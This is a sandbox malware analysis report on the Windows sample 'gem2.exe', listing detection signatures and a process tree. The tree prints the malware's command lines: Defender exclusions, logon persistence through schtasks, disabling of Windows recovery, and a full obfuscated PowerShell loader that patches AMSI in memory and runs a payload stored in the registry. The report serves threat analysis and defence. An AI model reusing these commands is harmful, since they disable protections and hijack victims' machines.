Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gem2.exe

Overview

General Information

Sample name:gem2.exe
Analysis ID:1589411
MD5:be89d598cd96443479c02b022ff70532
SHA1:f0ab69f56ebbbdda791d61fd3d22476d61135871
SHA256:a4c4487dcacebf5048b2266233f5645cfe421154f26e6685ced36aa0621037f1
Tags:66-63-187-250exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory in foreign processes
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • gem2.exe (PID: 2692 cmdline: "C:\Users\user\Desktop\gem2.exe" MD5: BE89D598CD96443479C02B022FF70532)
    • powershell.exe (PID: 4684 cmdline: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7256 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7476 cmdline: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 7628 cmdline: C:\Windows\System32\svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • powercfg.exe (PID: 7700 cmdline: powercfg -change standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7716 cmdline: powercfg -change monitor-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7736 cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7764 cmdline: powercfg /setactive SCHEME_CURRENT MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7804 cmdline: cmd.exe /C reagentc /disable MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ReAgentc.exe (PID: 7968 cmdline: reagentc /disable MD5: A109CC3B919C7D40E4114966340F39E5)
      • cmd.exe (PID: 8032 cmdline: cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8076 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8184 cmdline: cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6708 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7304 cmdline: cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • takeown.exe (PID: 7356 cmdline: takeown /f C:\Windows\System32\reagentc.exe MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • cmd.exe (PID: 2192 cmdline: cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 7516 cmdline: icacls C:\Windows\System32\reagentc.exe /grant administrators:F MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 7508 cmdline: cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 5520 cmdline: icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X) MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • WMIC.exe (PID: 5988 cmdline: wmic diskdrive get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1552 cmdline: wmic diskdrive get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 2236 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 7788 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • System-f4855f59e0.exe (PID: 7524 cmdline: C:\Windows\System32\System-f4855f59e0.exe MD5: BE89D598CD96443479C02B022FF70532)
  • Microsoft-f4855f59e0.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • powershell.exe (PID: 7992 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$kpBUoTRvoOegOC=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+'r'+'o'+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EtevswwRQwRAejVCuvR=EtrMmUyKmezi @([String])([IntPtr]);$JKiOnBfFNlGvOZPRImquAA=EtrMmUyKmezi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YdcUizEhLfa=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$scwfUeOSfALItM=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$OBgtMEtNHoxgskRxX=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$CdwwlVp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scwfUeOSfALItM,$EtevswwRQwRAejVCuvR).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$TXsAOQOMQALSJtBsu=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$CdwwlVp,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$TBhmHaliuf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,4,[ref]$TBhmHaliuf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TXsAOQOMQALSJtBsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,0x20,[ref]$TBhmHaliuf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'L'+''+'M'+''+[Char](88)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 1252 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • WinDrive-f4855f59e0.exe (PID: 8168 cmdline: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • Microsoft-f4855f59e0.exe (PID: 2168 cmdline: "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine|base64offset|contains: H!", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, ProcessId: 7476, ProcessName: schtasks.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine|base64offset|contains: H!", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, ProcessId: 7476, ProcessName: schtasks.exe
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$kpBUo
Sigma detected: Potential WinAPI Calls Via CommandLine
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 